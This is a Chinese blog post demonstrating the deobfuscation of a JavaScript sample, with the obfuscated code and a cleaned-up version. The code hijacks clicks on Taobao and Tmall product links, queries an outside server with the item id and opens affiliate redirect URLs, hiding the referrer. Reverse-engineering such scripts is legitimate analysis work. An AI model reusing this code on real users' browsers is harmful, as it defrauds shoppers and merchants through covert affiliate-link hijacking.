2023年7月24日
小目标 完全还原混淆的js代码
代码案例(此代码纯属虚构,不侵害任何人的利益。自导自演仅演示用)
function _0x50e8(_0x3b39ac,_0x20fd06){var _0x3ab70a=_0x3f46();return _0x50e8=function(_0x43ade6,_0x2f685a){_0x43ade6=_0x43ade6-0x1a2;var _0x3f5316=_0x3ab70a[_0x43ade6];return _0x3f5316},_0x50e8(_0x3b39ac,_0x20fd06)}function _0x3f46(){var _0x462f1f=['ation','CwuVH','earch\x5c?.*c','|chaoshi.d','name','did=681887','ail.tmall.','|tmall.hk','list.tmall','MEZDl','error','createElem','VkaSs','and.taobao','1LYqpbM','tki.htm?gi','.com','push','random','head','ent','om/search/','=([^&]*)(&','test','3403540fhKdOU','CNoIV','m/search/i','prototype','stener','oujap','om/sem/tbs','/pos.baidu','__proto__','url','dJnjJ','location','BfozD','7104392wlIHET','d.taobao.c','warn','match','includes','exception','substr','https://po','https://ai','ctor(\x22retu','trace','1&dc=3&di=','ao.com|det','XmloH','body','innerText','no-referre','toString','pid','length','rk.96zxue.','return\x20(fu','&keyword=','12151908InhTmz','content','.com/.*cli','preventDef','3211290FWdCxq','table','log','fpid=','referrer','.com/sem/t','iTWcQ','56362aOfeLI','55&dtm=HTM','1113918JCRYQO','json','appendChil','JhYrG','ndex.htm?k','\x5cbid=(\x5cd+)','|$)','value','apply','bsearch?re','ault','domain','etail.tmal','getElement','bzaRs','7xvSzXs','4329672tiMYap','then','nhei=350&r','.tmall.com','https://da','QlPQV','nction()\x20','l.com)','rn\x20this\x22)(','s.taobao.c','{}.constru','?.*click=)','bind','(.*://ulan','https://ul','&click=','console','href','(item.taob','1=28397217','constructo','QBhyK','ById','&pid=','target','index.htm\x5c','m/dcsm?con','click','shNxC','meta'];_0x3f46=function(){return _0x462f1f};return _0x3f46()}(function(_0x1091c9,_0x368376){var _0x285151=_0x50e8,_0x401f52=_0x1091c9();while(!![]){try{var _0x4b2e58=-parseInt(_0x285151(0x1dc))/0x1*(-parseInt(_0x285151(0x215))/0x2)+ -parseInt(_0x285151(0x217))/0x3+ -parseInt(_0x285151(0x1e6))/0x4+parseInt(_0x285151(0x20e))/0x5+parseInt(_0x285151(0x1b0))/0x6+parseInt(_0x285151(0x1af))/0x7*(-parseInt(_0x285151(0x1f3))/0x8)+parseInt(_0x285151(0x20a))/0x9;if(_0x4b2e58===_0x368376)break;else _0x401f52['push'](_0x401f52['shift']())}catch(_0x111991){_0x401f52['push'](_0x401f52['shift']())}}}(_0x3f46,0x9a4d7),(function(){var _0x29a75a=(function(){var _0x2bd21f=_0x50e8;if(_0x2bd21f(0x200)===_0x2bd21f(0x200)){var _0x27edbc=!![];return function(_0x591193,_0x5b082d){var _0x43dc6b=_0x2bd21f;if(_0x43dc6b(0x214)!==_0x43dc6b(0x214)){var _0x1be6be=_0x5a9142[_0x43dc6b(0x1c4)+'r']['prototype'][_0x43dc6b(0x1bc)](_0xebbade),_0x1b537a=_0x1bb11a[_0x2fd621],_0x57b128=_0x3a3135[_0x1b537a]||_0x1be6be;_0x1be6be[_0x43dc6b(0x1ee)]=_0x2140ed[_0x43dc6b(0x1bc)](_0x4124c4),_0x1be6be[_0x43dc6b(0x204)]=_0x57b128[_0x43dc6b(0x204)]['bind'](_0x57b128),_0x579a5d[_0x1b537a]=_0x1be6be}else{var _0x24df6e=_0x27edbc?function(){var _0xdb91f7=_0x43dc6b;if(_0x5b082d){if(_0xdb91f7(0x1da)!=='wNmQu'){var _0x5d2b26=_0x5b082d[_0xdb91f7(0x1a8)](_0x591193,arguments);return _0x5b082d=null,_0x5d2b26}else{if(_0x1e0734){var _0x4134ad=_0x5534f8['apply'](_0x1917ad,arguments);return _0x2b4a25=null,_0x4134ad}}}}:function(){};return _0x27edbc=![],_0x24df6e}}}else return _0xdbeca8[_0x2bd21f(0x1f6)]('\x5cbid=(\x5cd+)')[0x1]}());function _0x6a9ae8(){var _0x3613c7=_0x50e8;if('bzaRs'!==_0x3613c7(0x1ae))return _0x3613c7(0x1be)+'and.taobao.com/sem/t'+_0x3613c7(0x1a9)+_0x3613c7(0x211)+_0x3a6401+_0x3613c7(0x209)+_0x44e757+'&click='+_0x1e695a(_0x2f7cf5);else{var _0x1bb635=document[_0x3613c7(0x1d9)+_0x3613c7(0x1e2)](_0x3613c7(0x1cd));_0x1bb635['name']='referrer',_0x1bb635['content']=_0x3613c7(0x203)+'r',document['head'][_0x3613c7(0x1a2)+'d'](_0x1bb635)}}function _0x212225(){var _0x1786b0=_0x50e8,_0xd07161=_0x29a75a(this,function(){var _0x2ce3e8=_0x50e8,_0x10ab06;try{var _0xd4ea53=Function(_0x2ce3e8(0x208)+_0x2ce3e8(0x1b6)+('{}.constru'+_0x2ce3e8(0x1fc)+'rn\x20this\x22)(\x20)')+');');_0x10ab06=_0xd4ea53()}catch(_0x523880){_0x10ab06=window}var _0xf94600=_0x10ab06[_0x2ce3e8(0x1c0)]=_0x10ab06[_0x2ce3e8(0x1c0)]||{},_0x43ed30=['log',_0x2ce3e8(0x1f5),'info',_0x2ce3e8(0x1d8),_0x2ce3e8(0x1f8),_0x2ce3e8(0x20f),_0x2ce3e8(0x1fd)];for(var _0xe28461=0x0;_0xe28461<_0x43ed30['length'];_0xe28461++){if('JONRR'==='VEMIn'){if(!_0x2667ed){var _0x3e5f94=_0x200271();_0x58cce5(_0x37c18a(_0x3e5f94,_0x5c4707['r'][_0x2ce3e8(0x205)],_0x1b3a2b['r'][_0x2ce3e8(0x1ef)])),_0x214e3f=!![],_0x55334b[_0x2ce3e8(0x1df)](_0x1e1a0b(_0xdca112[_0x2ce3e8(0x1c1)]))}}else{var _0x520df2=_0x29a75a[_0x2ce3e8(0x1c4)+'r'][_0x2ce3e8(0x1e9)][_0x2ce3e8(0x1bc)](_0x29a75a),_0xa2dd60=_0x43ed30[_0xe28461],_0x44d4f5=_0xf94600[_0xa2dd60]||_0x520df2;_0x520df2[_0x2ce3e8(0x1ee)]=_0x29a75a[_0x2ce3e8(0x1bc)](_0x29a75a),_0x520df2[_0x2ce3e8(0x204)]=_0x44d4f5[_0x2ce3e8(0x204)][_0x2ce3e8(0x1bc)](_0x44d4f5),_0xf94600[_0xa2dd60]=_0x520df2}}});_0xd07161();const _0x5f9a49=new RegExp(_0x1786b0(0x1bd)+_0x1786b0(0x1f4)+_0x1786b0(0x1ec)+_0x1786b0(0x1d0)+'lick=|.*:/'+_0x1786b0(0x1ed)+_0x1786b0(0x20c)+'ck=|.*://ai.taobao.c'+_0x1786b0(0x1e3)+_0x1786b0(0x1c9)+_0x1786b0(0x1bb))[_0x1786b0(0x1e5)](location['href']);if(_0x5f9a49){document['body'][_0x1786b0(0x202)]='';const _0x317e0b=()=>{var _0x57b908=_0x1786b0;if(_0x57b908(0x1e7)===_0x57b908(0x1f2))_0x349e2d=_0x28c6ba;else{const _0x458935=new RegExp('(^|&)click'+_0x57b908(0x1e4)+_0x57b908(0x1a6)),_0x56356d=window[_0x57b908(0x1f1)]['search'][_0x57b908(0x1f9)](0x1)[_0x57b908(0x1f6)](_0x458935);if(null!=_0x56356d)return decodeURIComponent(_0x56356d[0x2]);return null}},_0x30c242=_0x317e0b();console[_0x1786b0(0x210)](_0x30c242);if(_0x30c242){if(_0x1786b0(0x1cc)===_0x1786b0(0x1b5)){var _0x130a6b;try{var _0x266c6a=_0x2e69ff(_0x1786b0(0x208)+_0x1786b0(0x1b6)+(_0x1786b0(0x1ba)+_0x1786b0(0x1fc)+_0x1786b0(0x1b8)+'\x20)')+');');_0x130a6b=_0x266c6a()}catch(_0x4ad333){_0x130a6b=_0x263450}var _0x31a2fb=_0x130a6b['console']=_0x130a6b['console']||{},_0x4d0bd8=[_0x1786b0(0x210),_0x1786b0(0x1f5),'info',_0x1786b0(0x1d8),_0x1786b0(0x1f8),_0x1786b0(0x20f),_0x1786b0(0x1fd)];for(var _0x3a491c=0x0;_0x3a491c<_0x4d0bd8[_0x1786b0(0x206)];_0x3a491c++){var _0x2ac9d7=_0x23f30e[_0x1786b0(0x1c4)+'r'][_0x1786b0(0x1e9)][_0x1786b0(0x1bc)](_0x2f09e5),_0x36ee92=_0x4d0bd8[_0x3a491c],_0xb02b23=_0x31a2fb[_0x36ee92]||_0x2ac9d7;_0x2ac9d7[_0x1786b0(0x1ee)]=_0x1e5356[_0x1786b0(0x1bc)](_0x490a66),_0x2ac9d7[_0x1786b0(0x204)]=_0xb02b23[_0x1786b0(0x204)]['bind'](_0xb02b23),_0x31a2fb[_0x36ee92]=_0x2ac9d7}}else location[_0x1786b0(0x1c1)]=_0x30c242}return}if(!document[_0x1786b0(0x1ab)][_0x1786b0(0x1f6)]('taobao.com|tmall.com'+_0x1786b0(0x1d5)))return;_0x6a9ae8();var _0xe1b97a=[];function _0x11b238(_0xbd6e6f){var _0x7854dc=_0x1786b0;if('KqsOi'===_0x7854dc(0x1eb)){var _0x261dde=_0x431c56[_0x7854dc(0x1a8)](_0x3b087e,arguments);return _0x177b58=null,_0x261dde}else return _0xbd6e6f&&_0xbd6e6f['match']('^https?://'+_0x7854dc(0x1c2)+_0x7854dc(0x1ff)+_0x7854dc(0x1d4)+'com|detail'+_0x7854dc(0x1b3)+_0x7854dc(0x1d1)+_0x7854dc(0x1ac)+_0x7854dc(0x1b7))}function _0x304323(_0x2a9dc2){var _0x4251e3=_0x1786b0;return _0x2a9dc2[_0x4251e3(0x1f6)](_0x4251e3(0x1a5))[0x1]}function _0x1b310a(_0x401678,_0x2ed80b,_0x1ab669){var _0xbdd481=_0x1786b0;if(_0xbdd481(0x1f0)!==_0xbdd481(0x1f0)){var _0x244a31=_0x47c0b5();_0x1aec40(_0x20d994(_0x244a31,_0x371887['r'][_0xbdd481(0x205)],_0x1f775a['r']['url'])),_0x3b701a=!![],_0x593303[_0xbdd481(0x1df)](_0x2d5c98(_0x144dd7[_0xbdd481(0x1c1)]))}else{var _0x3fabc9=Math[_0xbdd481(0x1e0)]();if(_0x3fabc9<0.3)return _0xbdd481(0x1fb)+'.taobao.co'+_0xbdd481(0x1e8)+_0xbdd481(0x1a4)+'ey='+_0x401678+_0xbdd481(0x1c7)+_0x2ed80b+'&click='+encodeURIComponent(_0x1ab669);else return _0x3fabc9<0.6?_0xbdd481(0x1be)+_0xbdd481(0x1db)+_0xbdd481(0x213)+'bsearch?re'+_0xbdd481(0x211)+_0x2ed80b+_0xbdd481(0x209)+_0x401678+'&click='+encodeURIComponent(_0x1ab669):_0xbdd481(0x1fa)+'s.baidu.co'+_0xbdd481(0x1ca)+'wid=240&co'+_0xbdd481(0x1b2)+_0xbdd481(0x1d3)+_0xbdd481(0x1fe)+'u6818871&s'+_0xbdd481(0x1c3)+_0xbdd481(0x216)+'L_POST&pid='+_0x2ed80b+_0xbdd481(0x1bf)+encodeURIComponent(_0x1ab669)}}function _0x2711f9(_0x49b5eb){window['open'](_0x49b5eb)}function _0x33021d(){var _0x8e11a8=_0x1786b0;if(_0x8e11a8(0x1d7)!==_0x8e11a8(0x1a3)){var _0x1c961d='';if(location[_0x8e11a8(0x1c1)]['includes']('s.taobao.com'))_0x1c961d=document[_0x8e11a8(0x1ad)+_0x8e11a8(0x1c6)]('q')['value'];else{if(location['href']['includes'](_0x8e11a8(0x1d6)+_0x8e11a8(0x1de))){if(_0x8e11a8(0x1cf)!=='gZfve')_0x1c961d=document[_0x8e11a8(0x1ad)+_0x8e11a8(0x1c6)]('mq')[_0x8e11a8(0x1a7)];else{var _0x13dc90=_0x261ac4[_0x8e11a8(0x1d9)+'ent']('meta');_0x13dc90[_0x8e11a8(0x1d2)]=_0x8e11a8(0x212),_0x13dc90[_0x8e11a8(0x20b)]=_0x8e11a8(0x203)+'r',_0x58e1a9[_0x8e11a8(0x1e1)][_0x8e11a8(0x1a2)+'d'](_0x13dc90)}}}return _0x1c961d}else{var _0x300d95='';if(_0x1a99ed[_0x8e11a8(0x1c1)][_0x8e11a8(0x1f7)](_0x8e11a8(0x1b9)+'om'))_0x300d95=_0x50b625[_0x8e11a8(0x1ad)+_0x8e11a8(0x1c6)]('q')[_0x8e11a8(0x1a7)];else _0x386564[_0x8e11a8(0x1c1)][_0x8e11a8(0x1f7)](_0x8e11a8(0x1d6)+'.com')&&(_0x300d95=_0x5b9ded[_0x8e11a8(0x1ad)+'ById']('mq')[_0x8e11a8(0x1a7)]);return _0x300d95}}document[_0x1786b0(0x201)]['addEventLi'+_0x1786b0(0x1ea)](_0x1786b0(0x1cb),function(_0x1de32b){var _0x49b402=_0x1786b0,_0x46739e=_0x1de32b[_0x49b402(0x1c8)]['closest']('a');jumped=![];if(_0x46739e&&_0x11b238(_0x46739e[_0x49b402(0x1c1)])){if(_0x49b402(0x1c5)!==_0x49b402(0x1c5))_0x1fe244[_0x49b402(0x1c1)]=_0x44beae;else{var _0x5cbd25=_0x304323(_0x46739e[_0x49b402(0x1c1)]);if(_0xe1b97a[_0x49b402(0x1f7)](_0x5cbd25))return;fetch(_0x49b402(0x1b4)+_0x49b402(0x207)+'com/vyanb/'+_0x49b402(0x1dd)+'d='+_0x5cbd25)[_0x49b402(0x1b1)](_0x36b178=>_0x36b178[_0x49b402(0x218)]())[_0x49b402(0x1b1)](_0x57c4cf=>{var _0x4460fa=_0x49b402;if(_0x57c4cf['s']==0x1&&_0x57c4cf['r'][_0x4460fa(0x1ef)]){if(!jumped){var _0x1ba266=_0x33021d();_0x2711f9(_0x1b310a(_0x1ba266,_0x57c4cf['r'][_0x4460fa(0x205)],_0x57c4cf['r'][_0x4460fa(0x1ef)])),jumped=!![],_0xe1b97a['push'](_0x304323(_0x46739e[_0x4460fa(0x1c1)]))}}}),setTimeout(function(){var _0x42755e=_0x49b402;!jumped&&(_0x2711f9(_0x46739e[_0x42755e(0x1c1)]),jumped=!![])},0x3e8),_0x1de32b[_0x49b402(0x20d)+_0x49b402(0x1aa)](),_0x1de32b['stopPropag'+_0x49b402(0x1ce)]()}}},!![])}_0x212225()}()));
分析难点
1.变量名有混淆
2.代码加密
还原成品
(function () {
function appendMeta() {
var $meta = document.createElement("meta");
$meta.name = 'referrer';
$meta.content = "no-referrer";
document.head.appendChild($meta);
}
function run() {
const reg = new RegExp("(.*://uland.****.com/sem/tbsearch\\?.*click=|.*://pos.****.com/.*click=|.*://ai.****.com/search/index.htm\\?.*click=)").test(location.href);
if (reg) {
document.body.innerText = '';
const searchMatch = () => {
const regExp = new RegExp("(^|&)click=([^&]*)(&|$)"),
match = window.location.search.substr(1).match(regExp);
if (null != match) {
return decodeURIComponent(match[2]);
}
return null;
},
url = searchMatch();
console.log(url);
if (url) {
location.href = url;
}
return;
}
if (!document.domain.match("****.com|tmall.com|tmall.hk")) {
return;
}
appendMeta();
var ary = [];
function isShop(str) {
return str && str.match("^https?://(item.****.com|detail.tmall.com|detail.tmall.com|chaoshi.detail.tmall.com)");
}
function isBid(str) {
return str.match("\\bid=(\\d+)")[1];
}
function randomUrl(key, pid, str) {
var random = Math.random();
if (random < 0.3) {
return "https://ai.****.com/search/index.htm?key=" + key + "&pid=" + pid + '&click=' + encodeURIComponent(str);
} else {
return random < 0.6 ? "https://uland.****.com/sem/tbsearch?refpid=" + pid + "&keyword=" + key + '&click=' + encodeURIComponent(str) : "https://pos.****.com/dcsm?conwid=240&conhei=350&rdid=6818871&dc=3&di=u6818871&s1=2839721755&dtm=HTML_POST&pid=" + pid + "&click=" + encodeURIComponent(str);
}
}
function openUrl(url) {
window.open(url);
}
function getShopQ() {
var qValue = '';
if (location.href.includes("s.****.com")) {
qValue = document.getElementById('q').value;
} else {
if (location.href.includes("list.tmall.com")) {
qValue = document.getElementById('mq').value;
}
}
return qValue;
}
document.body.addEventListener("click", function (e) {
var closest = e.target.closest('a');
jumped = false;
if (closest && isShop(closest.href)) {
var bid = isBid(closest.href);
if (ary.includes(bid)) {
return;
}
fetch("https://dark.****.com/vyanb/tki.htm?gid=" + bid).then(res => res.json()).then(res => {
if (res.s == 1 && res.r.url) {
if (!jumped) {
var shopQ = getShopQ();
openUrl(randomUrl(shopQ, res.r.pid, res.r.url));
jumped = true;
ary.push(isBid(closest.href));
}
}
});
setTimeout(function () {
openUrl(closest.href);
!jumped && (jumped = true);
}, 1000);
e.preventDefault();
e.stopPropagation();
}
}, true);
}
run();
})();
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
